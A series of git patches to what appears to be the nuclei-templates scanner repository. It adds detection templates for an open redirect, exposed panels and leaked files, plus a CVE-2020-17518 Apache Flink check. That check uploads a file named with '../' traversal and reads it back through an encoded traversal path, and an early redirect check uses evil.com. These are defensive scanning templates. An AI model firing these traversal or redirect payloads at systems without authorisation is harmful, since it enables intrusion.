From c5838760feeb96cf4f335f67b876ebf200b91cb3 Mon Sep 17 00:00:00 2001
From: Gal Nagli <35578316+NagliNagli@users.noreply.github.com>
Date: Tue, 29 Dec 2020 00:51:40 +0200
Subject: [PATCH 01/85] Create thinkific-redirect.yaml

---
 vulnerabilities/thinkific-redirect.yaml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 vulnerabilities/thinkific-redirect.yaml

diff --git a/vulnerabilities/thinkific-redirect.yaml b/vulnerabilities/thinkific-redirect.yaml
new file mode 100644
index 0000000000..01d8b2f282
--- /dev/null
+++ b/vulnerabilities/thinkific-redirect.yaml
@@ -0,0 +1,24 @@
+id: thinkific-redirect
+
+info:
+  name: Open Redirect vulnerability on thinkific websites
+  author: Gal Nagli
+  severity: Medium
+
+
+requests:
+  - method: GET
+
+    path:
+      - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://evil.com"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 302
+      - type: word
+        words:
+          - "<a href=\"http://evil.com?kind=jwt&amp;message=Nil+JSON+web+token\""
+        condition: or
+        part: body

From 9a1c93c1c08b8d974280106c513642b45750aa7a Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Tue, 29 Dec 2020 11:30:30 +0530
Subject: [PATCH 02/85] Update thinkific-redirect.yaml

---
 vulnerabilities/thinkific-redirect.yaml | 12 +++++-------
 1 file changed, 5 insertions(+), 7 deletions(-)

diff --git a/vulnerabilities/thinkific-redirect.yaml b/vulnerabilities/thinkific-redirect.yaml
index 01d8b2f282..17873bceb3 100644
--- a/vulnerabilities/thinkific-redirect.yaml
+++ b/vulnerabilities/thinkific-redirect.yaml
@@ -1,16 +1,15 @@
 id: thinkific-redirect
 
 info:
-  name: Open Redirect vulnerability on thinkific websites
+  name: Thinkific Open URL Redirect
   author: Gal Nagli
-  severity: Medium
-
+  severity: low
 
 requests:
   - method: GET
 
     path:
-      - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://evil.com"
+      - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://example.com"
 
     matchers-condition: and
     matchers:
@@ -19,6 +18,5 @@ requests:
           - 302
       - type: word
         words:
-          - "<a href=\"http://evil.com?kind=jwt&amp;message=Nil+JSON+web+token\""
-        condition: or
-        part: body
+          - "<a href=\"http://example.com?kind=jwt&amp;message=Nil+JSON+web+token\""
+        part: body
\ No newline at end of file

From 11f9cde3a35aeb531338e0cc3f81ba0b676e28d2 Mon Sep 17 00:00:00 2001
From: PR3R00T <50199640+PR3R00T@users.noreply.github.com>
Date: Wed, 6 Jan 2021 14:00:51 +0000
Subject: [PATCH 03/85] Locate Fortigate Fortiweb panels,

In preparation for the new set of unauthenticated vulnerabilities (https://twitter.com/ptswarm/status/1346806951326396416)
---
 panels/fortiweb-panel.yaml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 panels/fortiweb-panel.yaml

diff --git a/panels/fortiweb-panel.yaml b/panels/fortiweb-panel.yaml
new file mode 100644
index 0000000000..060b97d997
--- /dev/null
+++ b/panels/fortiweb-panel.yaml
@@ -0,0 +1,24 @@
+id: fortiweb-login
+
+info:
+  name: Fortinet FortiWeb Login Panel
+  author: PR3R00T
+  severity: info
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Please login"
+          - "ftnt-fortinet-grid"
+          - "main-fortiweb.css"
+        condition: and
+        part: body
+
+      - type: status
+        status:
+          - 200

From b5538255a3f22adca8c64b44be092419a1965556 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Wed, 6 Jan 2021 14:33:55 +0000
Subject: [PATCH 04/85] Auto Update README [Wed Jan  6 14:33:55 UTC 2021]
 :robot:

---
 README.md | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/README.md b/README.md
index 69b5627dc8..936a49433e 100644
--- a/README.md
+++ b/README.md
@@ -11,12 +11,12 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 
 An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. 
 
-### Nuclei templates `v7.3.6` overview
+### Nuclei templates `v7.3.7` overview
 
 | Templates          | Counts                           | Templates                 | Counts                                  |
 | ------------------ | -------------------------------- | ------------------------- | --------------------------------------- |
 | cves               | 146             | files                     | 48                     |
-| vulnerabilities    | 42    | panels                    | 49                    |
+| vulnerabilities    | 42    | panels                    | 50                    |
 | technologies       | 41       | security-misconfiguration | 29 |
 | workflows          | 17          | tokens                    | 8                    |
 | dns                | 6                | fuzzing                   | 6                   |
@@ -25,7 +25,7 @@ An overview of the nuclei template directory including number of templates and H
 | wordlists          | 1          | misc                      | 14                      |
 
 
-### Nuclei templates `v7.3.6` tree overview
+### Nuclei templates `v7.3.7` tree overview
 
 <details>
 <summary> Nuclei templates </summary>
@@ -286,6 +286,7 @@ An overview of the nuclei template directory including number of templates and H
 │   ├── crxde.yaml
 │   ├── docker-api.yaml
 │   ├── fortinet-fortigate-panel.yaml
+│   ├── fortiweb-panel.yaml
 │   ├── github-enterprise-detect.yaml
 │   ├── gitlab-detect.yaml
 │   ├── globalprotect-panel.yaml
@@ -479,7 +480,7 @@ An overview of the nuclei template directory including number of templates and H
 
 </details>
 
-**24 directories, 420 files**.
+**24 directories, 421 files**.
 
 Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. 
 

From 32143aa738c76edc720c072c7784c36b76fa316f Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Wed, 6 Jan 2021 23:08:45 +0530
Subject: [PATCH 05/85] Create CVE-2020-17518.yaml

---
 cves/2020/CVE-2020-17518.yaml | 32 ++++++++++++++++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 cves/2020/CVE-2020-17518.yaml

diff --git a/cves/2020/CVE-2020-17518.yaml b/cves/2020/CVE-2020-17518.yaml
new file mode 100644
index 0000000000..57bb7ccced
--- /dev/null
+++ b/cves/2020/CVE-2020-17518.yaml
@@ -0,0 +1,32 @@
+id: CVE-2020-17518
+
+info:
+  name: Apache Flink Upload Path Traversal
+  author: pd-team
+  severity: critical
+  reference: https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518
+
+requests:
+  - raw:
+      - |
+        POST /jars/upload HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Accept-Language: en
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
+        Content-Length: 187
+        
+        ------WebKitFormBoundaryoZ8meKnrrso89R6Y
+        Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc"
+        
+        test-poc
+        ------WebKitFormBoundaryoZ8meKnrrso89R6Y--
+
+  - method: GET
+    path:
+      - '{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc'
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "test-poc") == true && status_code == 200' # Using CVE-2020-17519 to confirm this.

From 2471e9b7768525527756fec55e70b14f6d66b21c Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Wed, 6 Jan 2021 17:39:24 +0000
Subject: [PATCH 06/85] Auto Update README [Wed Jan  6 17:39:24 UTC 2021]
 :robot:

---
 README.md | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 936a49433e..c017623950 100644
--- a/README.md
+++ b/README.md
@@ -15,7 +15,7 @@ An overview of the nuclei template directory including number of templates and H
 
 | Templates          | Counts                           | Templates                 | Counts                                  |
 | ------------------ | -------------------------------- | ------------------------- | --------------------------------------- |
-| cves               | 146             | files                     | 48                     |
+| cves               | 147             | files                     | 48                     |
 | vulnerabilities    | 42    | panels                    | 50                    |
 | technologies       | 41       | security-misconfiguration | 29 |
 | workflows          | 17          | tokens                    | 8                    |
@@ -151,6 +151,7 @@ An overview of the nuclei template directory including number of templates and H
 │       ├── CVE-2020-16952.yaml
 │       ├── CVE-2020-17505.yaml
 │       ├── CVE-2020-17506.yaml
+│       ├── CVE-2020-17518.yaml
 │       ├── CVE-2020-17519.yaml
 │       ├── CVE-2020-2096.yaml
 │       ├── CVE-2020-2140.yaml
@@ -480,7 +481,7 @@ An overview of the nuclei template directory including number of templates and H
 
 </details>
 
-**24 directories, 421 files**.
+**24 directories, 422 files**.
 
 Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. 
 

From a4c8f1c8ffe2aae1de0ee0498b01d4ddf809c128 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Wed, 6 Jan 2021 23:23:28 +0530
Subject: [PATCH 07/85] Added syfmony-profiler

---
 files/syfmony-profiler.yaml | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 files/syfmony-profiler.yaml

diff --git a/files/syfmony-profiler.yaml b/files/syfmony-profiler.yaml
new file mode 100644
index 0000000000..a561d00216
--- /dev/null
+++ b/files/syfmony-profiler.yaml
@@ -0,0 +1,25 @@
+id: syfmony-profiler
+
+info:
+  name: SymfonyProfiler information leakage
+  author: wabafet
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/_profiler/phpinfo.php"
+      - "{{BaseURL}}/_profiler/phpinfo"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "$_SERVER['SERVER_NAME']"
+          - "$_ENV['APP_SECRET']"
+          - "$_ENV['SYMFONY_DOTENV_VARS']"
+        condition: or
+
+      - type: status
+        status:
+          - 200

From f513e6739ae5d3189c199357e6fddd49909e5b25 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Wed, 6 Jan 2021 17:54:10 +0000
Subject: [PATCH 08/85] Auto Update README [Wed Jan  6 17:54:10 UTC 2021]
 :robot:

---
 README.md | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index c017623950..950c140f74 100644
--- a/README.md
+++ b/README.md
@@ -15,7 +15,7 @@ An overview of the nuclei template directory including number of templates and H
 
 | Templates          | Counts                           | Templates                 | Counts                                  |
 | ------------------ | -------------------------------- | ------------------------- | --------------------------------------- |
-| cves               | 147             | files                     | 48                     |
+| cves               | 147             | files                     | 49                     |
 | vulnerabilities    | 42    | panels                    | 50                    |
 | technologies       | 41       | security-misconfiguration | 29 |
 | workflows          | 17          | tokens                    | 8                    |
@@ -235,6 +235,7 @@ An overview of the nuclei template directory including number of templates and H
 │   ├── server-status-localhost.yaml
 │   ├── shell-history.yaml
 │   ├── sql-dump.yaml
+│   ├── syfmony-profiler.yaml
 │   ├── telerik-dialoghandler-detect.yaml
 │   ├── telerik-fileupload-detect.yaml
 │   ├── tomcat-scripts.yaml
@@ -481,7 +482,7 @@ An overview of the nuclei template directory including number of templates and H
 
 </details>
 
-**24 directories, 422 files**.
+**24 directories, 423 files**.
 
 Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. 
 

From ebe6aded7c82775f779b24c8f1f40eeb0a62c6c1 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Wed, 6 Jan 2021 18:08:48 +0000
Subject: [PATCH 09/85] Auto Update README [Wed Jan  6 18:08:48 UTC 2021]
 :robot:

---
 README.md | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 950c140f74..6bc48cbd79 100644
--- a/README.md
+++ b/README.md
@@ -15,7 +15,7 @@ An overview of the nuclei template directory including number of templates and H
 
 | Templates          | Counts                           | Templates                 | Counts                                  |
 | ------------------ | -------------------------------- | ------------------------- | --------------------------------------- |
-| cves               | 147             | files                     | 49                     |
+| cves               | 147             | files                     | 50                     |
 | vulnerabilities    | 42    | panels                    | 50                    |
 | technologies       | 41       | security-misconfiguration | 29 |
 | workflows          | 17          | tokens                    | 8                    |
@@ -239,6 +239,7 @@ An overview of the nuclei template directory including number of templates and H
 │   ├── telerik-dialoghandler-detect.yaml
 │   ├── telerik-fileupload-detect.yaml
 │   ├── tomcat-scripts.yaml
+│   ├── trace-axd-detect.yaml
 │   ├── wadl-files.yaml
 │   ├── web-config.yaml
 │   ├── wordpress-db-backup.yaml
@@ -482,7 +483,7 @@ An overview of the nuclei template directory including number of templates and H
 
 </details>
 
-**24 directories, 423 files**.
+**24 directories, 424 files**.
 
 Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. 
 

From 8a21f73b95e6a45049c533cc21ac515f93425903 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Wed, 6 Jan 2021 23:48:53 +0530
Subject: [PATCH 10/85] Update phpinfo.yaml

---
 files/phpinfo.yaml | 1 -
 1 file changed, 1 deletion(-)

diff --git a/files/phpinfo.yaml b/files/phpinfo.yaml
index af5b47b16c..61cd1b1dc6 100644
--- a/files/phpinfo.yaml
+++ b/files/phpinfo.yaml
@@ -11,7 +11,6 @@ requests:
       - "{{BaseURL}}/php.php"
       - "{{BaseURL}}/phpinfo.php"
       - "{{BaseURL}}/info.php"
-      - "{{BaseURL}}/_profiler/phpinfo"
       - "{{BaseURL}}/infophp.php"
       - "{{BaseURL}}/php_info.php"
       - "{{BaseURL}}/test.php"

From a316468af31f89f52c0c68e30ed9eeaaa06554cf Mon Sep 17 00:00:00 2001
From: Afaq <45089292+afaq1337@users.noreply.github.com>
Date: Thu, 7 Jan 2021 19:51:12 +0500
Subject: [PATCH 11/85] Add files via upload

---
 files/package-lock-json.yaml | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 files/package-lock-json.yaml

diff --git a/files/package-lock-json.yaml b/files/package-lock-json.yaml
new file mode 100644
index 0000000000..4db86156a6
--- /dev/null
+++ b/files/package-lock-json.yaml
@@ -0,0 +1,29 @@
+id: package-lock-json
+
+info:
+  name: npm package-lock.json information disclosure
+  author: afaq & geeknik
+  severity: info
+  description: npm packages contain a file, usually in the project root, called package-lock.json - this file contains all the dependencies and verison details of the project.
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/package-lock.json"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "name"
+          - "version"
+        condition: and
+
+      - type: word
+        words:
+          - "application/json"
+        part: header
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file

From b6328c0951659592073cef8c6ebd4f6ccf9cedf9 Mon Sep 17 00:00:00 2001
From: Geeknik Labs <466878+geeknik@users.noreply.github.com>
Date: Thu, 7 Jan 2021 09:57:51 -0600
Subject: [PATCH 12/85] Create monit-detect.yaml

---
 technologies/monit-detect.yaml | 31 +++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 technologies/monit-detect.yaml

diff --git a/technologies/monit-detect.yaml b/technologies/monit-detect.yaml
new file mode 100644
index 0000000000..b1ce2c8ff8
--- /dev/null
+++ b/technologies/monit-detect.yaml
@@ -0,0 +1,31 @@
+id: monit-detect
+
+info:
+  name: Detect Monit Dashboard
+  author: geeknik
+  description: Monit is a small Open Source utility for managing and monitoring Unix systems -- https://mmonit.com/monit/
+  severity: info
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+          - 401
+        condition: or
+
+      - type: regex
+        part: header
+        regex:
+          - monit+
+
+    extractors:
+      - type: kval
+        part: header
+        kval:
+          - Server

From 87ec61f0de3bc59be12e6fcbde7bef7d41580095 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Fri, 8 Jan 2021 00:19:39 +0530
Subject: [PATCH 14/85] Update CVE-2020-17518.yaml

---
 cves/2020/CVE-2020-17518.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/cves/2020/CVE-2020-17518.yaml b/cves/2020/CVE-2020-17518.yaml
index 57bb7ccced..dd483cc1a0 100644
--- a/cves/2020/CVE-2020-17518.yaml
+++ b/cves/2020/CVE-2020-17518.yaml
@@ -15,10 +15,10 @@ requests:
         Accept-Language: en
         Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
         Content-Length: 187
-        
+
         ------WebKitFormBoundaryoZ8meKnrrso89R6Y
         Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc"
-        
+
         test-poc
         ------WebKitFormBoundaryoZ8meKnrrso89R6Y--
 

From eb66806f5c0d352651565add8c6b2741a5f5dd85 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Fri, 8 Jan 2021 00:26:47 +0530
Subject: [PATCH 15/85] updated template to add new endpoint

---
 files/package-json.yaml      |  3 ++-
 files/package-lock-json.yaml | 29 -----------------------------
 2 files changed, 2 insertions(+), 30 deletions(-)
 delete mode 100644 files/package-lock-json.yaml

diff --git a/files/package-json.yaml b/files/package-json.yaml
index e03b1a75ae..44202a689f 100644
--- a/files/package-json.yaml
+++ b/files/package-json.yaml
@@ -2,7 +2,7 @@ id: package-json
 
 info:
   name: npm package.json disclosure
-  author: geeknik
+  author: geeknik & afaq
   severity: info
   description: All npm packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project.
 
@@ -10,6 +10,7 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/package.json"
+      - "{{BaseURL}}/package-lock.json"
 
     matchers-condition: and
     matchers:
diff --git a/files/package-lock-json.yaml b/files/package-lock-json.yaml
deleted file mode 100644
index 4db86156a6..0000000000
--- a/files/package-lock-json.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: package-lock-json
-
-info:
-  name: npm package-lock.json information disclosure
-  author: afaq & geeknik
-  severity: info
-  description: npm packages contain a file, usually in the project root, called package-lock.json - this file contains all the dependencies and verison details of the project.
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/package-lock.json"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "name"
-          - "version"
-        condition: and
-
-      - type: word
-        words:
-          - "application/json"
-        part: header
-
-      - type: status
-        status:
-          - 200
\ No newline at end of file

From 07d2aec8b623f5d068e0274b2e79197e7273c905 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Fri, 8 Jan 2021 00:48:22 +0530
Subject: [PATCH 16/85] Update monit-detect.yaml

---
 technologies/monit-detect.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/technologies/monit-detect.yaml b/technologies/monit-detect.yaml
index b1ce2c8ff8..5a46f702cf 100644
--- a/technologies/monit-detect.yaml
+++ b/technologies/monit-detect.yaml
@@ -19,10 +19,10 @@ requests:
           - 401
         condition: or
 
-      - type: regex
+      - type: word
         part: header
-        regex:
-          - monit+
+        words:
+          - 'Server: monit'
 
     extractors:
       - type: kval

From 81e207870e1272b8cfd4f28957ff9bd399e9b119 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Fri, 8 Jan 2021 00:51:12 +0530
Subject: [PATCH 17/85] Update tech-detect.yaml

---
 technologies/tech-detect.yaml | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml
index 1b73a91967..6e7bd9c755 100644
--- a/technologies/tech-detect.yaml
+++ b/technologies/tech-detect.yaml
@@ -2740,4 +2740,10 @@ requests:
           - "<title>pfSense - Login</title>"
           - "maintained by Netgate"
         part: body
-        condition: and
\ No newline at end of file
+        condition: and
+
+      - type: word
+        name: monit
+        part: header
+        words:
+          - 'Server: monit'
\ No newline at end of file

From 7b749674d4b0cc874dd5a96d062aadf80094a385 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Fri, 8 Jan 2021 00:51:59 +0530
Subject: [PATCH 18/85] Delete monit-detect.yaml

---
 technologies/monit-detect.yaml | 31 -------------------------------
 1 file changed, 31 deletions(-)
 delete mode 100644 technologies/monit-detect.yaml

diff --git a/technologies/monit-detect.yaml b/technologies/monit-detect.yaml
deleted file mode 100644
index 5a46f702cf..0000000000
--- a/technologies/monit-detect.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: monit-detect
-
-info:
-  name: Detect Monit Dashboard
-  author: geeknik
-  description: Monit is a small Open Source utility for managing and monitoring Unix systems -- https://mmonit.com/monit/
-  severity: info
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-          - 401
-        condition: or
-
-      - type: word
-        part: header
-        words:
-          - 'Server: monit'
-
-    extractors:
-      - type: kval
-        part: header
-        kval:
-          - Server

From 21ea71e4c18b0e1e476c067fd77cc43cb5599e7a Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Fri, 8 Jan 2021 17:11:53 +0530
Subject: [PATCH 19/85] moving to new directory structure

---
 .../grafana-default-credential.yaml                               | 0
 .../rabbitmq-default-admin.yaml                                   | 0
 .../solarwinds-default-admin.yaml                                 | 0
 .../tomcat-manager-default.yaml                                   | 0
 {files => exposed-files}/apc-info.yaml                            | 0
 {files => exposed-files}/cgi-test-page.yaml                       | 0
 {files => exposed-files}/composer-config.yaml                     | 0
 {files => exposed-files}/docker-registry.yaml                     | 0
 {files => exposed-files}/domcfg-page.yaml                         | 0
 {files => exposed-files}/druid-monitor.yaml                       | 0
 {files => exposed-files}/drupal-install.yaml                      | 0
 {files => exposed-files}/ds_store.yaml                            | 0
 {files => exposed-files}/elasticsearch.yaml                       | 0
 {files => exposed-files}/elmah-log-file.yaml                      | 0
 {files => exposed-files}/error-logs.yaml                          | 0
 {files => exposed-files}/exposed-kibana.yaml                      | 0
 {files => exposed-files}/exposed-svn.yaml                         | 0
 {files => exposed-files}/filezilla.yaml                           | 0
 {files => exposed-files}/firebase-detect.yaml                     | 0
 {files => exposed-files}/git-config.yaml                          | 0
 {files => exposed-files}/graylog-api-browser.yaml                 | 0
 {files => exposed-files}/htpasswd-detection.yaml                  | 0
 {files => exposed-files}/jkstatus-manager.yaml                    | 0
 {files => exposed-files}/jolokia.yaml                             | 0
 {files => exposed-files}/laravel-env.yaml                         | 0
 {files => exposed-files}/lazy-file.yaml                           | 0
 {files => exposed-files}/magento-config.yaml                      | 0
 {files => exposed-files}/owncloud-config.yaml                     | 0
 {files => exposed-files}/package-json.yaml                        | 0
 {files => exposed-files}/php-errors.yaml                          | 0
 {files => exposed-files}/phpinfo.yaml                             | 0
 {files => exposed-files}/public-tomcat-instance.yaml              | 0
 {files => exposed-files}/redmine-db-config.yaml                   | 0
 {files => exposed-files}/server-private-keys.yaml                 | 0
 {files => exposed-files}/server-status-localhost.yaml             | 0
 {files => exposed-files}/shell-history.yaml                       | 0
 {files => exposed-files}/sql-dump.yaml                            | 0
 {files => exposed-files}/syfmony-profiler.yaml                    | 0
 {files => exposed-files}/telerik-dialoghandler-detect.yaml        | 0
 {files => exposed-files}/telerik-fileupload-detect.yaml           | 0
 {files => exposed-files}/tomcat-scripts.yaml                      | 0
 {files => exposed-files}/trace-axd-detect.yaml                    | 0
 {files => exposed-files}/wadl-files.yaml                          | 0
 {files => exposed-files}/web-config.yaml                          | 0
 {files => exposed-files}/wordpress-db-backup.yaml                 | 0
 {files => exposed-files}/wordpress-debug-log.yaml                 | 0
 {files => exposed-files}/wordpress-directory-listing.yaml         | 0
 {files => exposed-files}/wordpress-emergency-script.yaml          | 0
 {files => exposed-files}/wordpress-installer-log.yaml             | 0
 {files => exposed-files}/wordpress-tmm-db-migrate.yaml            | 0
 {files => exposed-files}/wordpress-user-enumeration.yaml          | 0
 {files => exposed-files}/wsdl-detect.yaml                         | 0
 {files => exposed-files}/xprober-service.yaml                     | 0
 {files => exposed-files}/zip-backup-files.yaml                    | 0
 {panels => exposed-panels}/adminer-panel.yaml                     | 0
 {panels => exposed-panels}/aims-password-mgmt-client.yaml         | 0
 {panels => exposed-panels}/atlassian-crowd-panel.yaml             | 0
 {panels => exposed-panels}/cisco-asa-panel.yaml                   | 0
 {panels => exposed-panels}/citrix-adc-gateway-detect.yaml         | 0
 {panels => exposed-panels}/citrix-vpn-detect.yaml                 | 0
 {panels => exposed-panels}/compal.yaml                            | 0
 {panels => exposed-panels}/crxde.yaml                             | 0
 {panels => exposed-panels}/docker-api.yaml                        | 0
 {panels => exposed-panels}/fortinet-fortigate-panel.yaml          | 0
 {panels => exposed-panels}/fortiweb-panel.yaml                    | 0
 {panels => exposed-panels}/github-enterprise-detect.yaml          | 0
 {panels => exposed-panels}/gitlab-detect.yaml                     | 0
 {panels => exposed-panels}/globalprotect-panel.yaml               | 0
 {panels => exposed-panels}/go-anywhere-client.yaml                | 0
 {panels => exposed-panels}/grafana-detect.yaml                    | 0
 {panels => exposed-panels}/identityguard-selfservice-entrust.yaml | 0
 .../iomega-lenovo-emc-shared-nas-detect.yaml                      | 0
 {panels => exposed-panels}/jenkins-asyncpeople.yaml               | 0
 {panels => exposed-panels}/jmx-console.yaml                       | 0
 {panels => exposed-panels}/kubernetes-pods.yaml                   | 0
 {panels => exposed-panels}/manage-engine-admanager-panel.yaml     | 0
 {panels => exposed-panels}/mobileiron-login.yaml                  | 0
 {panels => exposed-panels}/netscaler-gateway.yaml                 | 0
 {panels => exposed-panels}/network-camera-detect.yaml             | 0
 {panels => exposed-panels}/oipm-detect.yaml                       | 0
 {panels => exposed-panels}/parallels-html-client.yaml             | 0
 {panels => exposed-panels}/phpmyadmin-panel.yaml                  | 0
 {panels => exposed-panels}/polycom-admin-detect.yaml              | 0
 {panels => exposed-panels}/pulse-secure-panel.yaml                | 0
 {panels => exposed-panels}/rabbitmq-dashboard.yaml                | 0
 {panels => exposed-panels}/rsa-self-service.yaml                  | 0
 {panels => exposed-panels}/sap-hana-xsengine-panel.yaml           | 0
 {panels => exposed-panels}/sap-netweaver-detect.yaml              | 0
 {panels => exposed-panels}/sap-recon-detect.yaml                  | 0
 {panels => exposed-panels}/solarwinds-orion.yaml                  | 0
 {panels => exposed-panels}/sonarqube-login.yaml                   | 0
 {panels => exposed-panels}/sonicwall-management-panel.yaml        | 0
 {panels => exposed-panels}/sonicwall-sslvpn-panel.yaml            | 0
 {panels => exposed-panels}/sophos-fw-version-detect.yaml          | 0
 {panels => exposed-panels}/supervpn-panel.yaml                    | 0
 {panels => exposed-panels}/swagger-panel.yaml                     | 0
 {panels => exposed-panels}/tikiwiki-cms.yaml                      | 0
 {panels => exposed-panels}/traefik-dashboard.yaml                 | 0
 {panels => exposed-panels}/virtual-ema-detect.yaml                | 0
 {panels => exposed-panels}/weave-scope-dashboard-detect.yaml      | 0
 {panels => exposed-panels}/webeditors.yaml                        | 0
 {panels => exposed-panels}/webmin-panel.yaml                      | 0
 {panels => exposed-panels}/workspace-one-uem.yaml                 | 0
 .../workspaceone-uem-airwatch-dashboard-detect.yaml               | 0
 .../tokens}/amazon-mws-auth-token-value.yaml                      | 0
 {tokens => exposed-tokens/tokens}/aws-access-key-value.yaml       | 0
 {tokens => exposed-tokens/tokens}/credentials-disclosure.yaml     | 0
 {tokens => exposed-tokens/tokens}/fcm-server-key.yaml             | 0
 {tokens => exposed-tokens/tokens}/google-api-key.yaml             | 0
 {tokens => exposed-tokens/tokens}/http-username-password.yaml     | 0
 {tokens => exposed-tokens/tokens}/mailchimp-api-key.yaml          | 0
 {tokens => exposed-tokens/tokens}/slack-access-token.yaml         | 0
 {payloads => helpers/payloads}/CVE-2020-5776.csv                  | 0
 {payloads => helpers/payloads}/CVE-2020-6287.xml                  | 0
 {wordlists => helpers/wordlists}/wp-plugins.txt                   | 0
 {misc => miscellaneous}/basic-cors-flash.yaml                     | 0
 {misc => miscellaneous}/dir-listing.yaml                          | 0
 {misc => miscellaneous}/htaccess-config.yaml                      | 0
 {misc => miscellaneous}/missing-csp.yaml                          | 0
 {misc => miscellaneous}/missing-hsts.yaml                         | 0
 {misc => miscellaneous}/missing-x-frame-options.yaml              | 0
 {misc => miscellaneous}/ntlm-directories.yaml                     | 0
 {misc => miscellaneous}/old-copyright.yaml                        | 0
 {misc => miscellaneous}/robots.txt.yaml                           | 0
 {misc => miscellaneous}/security.txt.yaml                         | 0
 {misc => miscellaneous}/trace-method.yaml                         | 0
 {misc => miscellaneous}/unencrypted-bigip-ltm-cookie.yaml         | 0
 {misc => miscellaneous}/wp-xmlrpc.yaml                            | 0
 {misc => miscellaneous}/xml-schema-detect.yaml                    | 0
 .../aem-groovyconsole.yaml                                        | 0
 .../apache-tomcat-snoop.yaml                                      | 0
 .../aspx-debug-mode.yaml                                          | 0
 {security-misconfiguration => misconfiguration}/basic-cors.yaml   | 0
 .../django-debug-detect.yaml                                      | 0
 .../drupal-user-enum-ajax.yaml                                    | 0
 .../drupal-user-enum-redirect.yaml                                | 0
 .../exposed-service-now.yaml                                      | 0
 .../front-page-misconfig.yaml                                     | 0
 .../generic-detections}/basic-xss-prober.yaml                     | 0
 .../generic-detections}/general-tokens.yaml                       | 0
 .../generic-detections}/top-15-xss.yaml                           | 0
 .../jenkins-stack-trace.yaml                                      | 0
 .../jira-service-desk-signup.yaml                                 | 0
 .../jira-unauthenticated-dashboards.yaml                          | 0
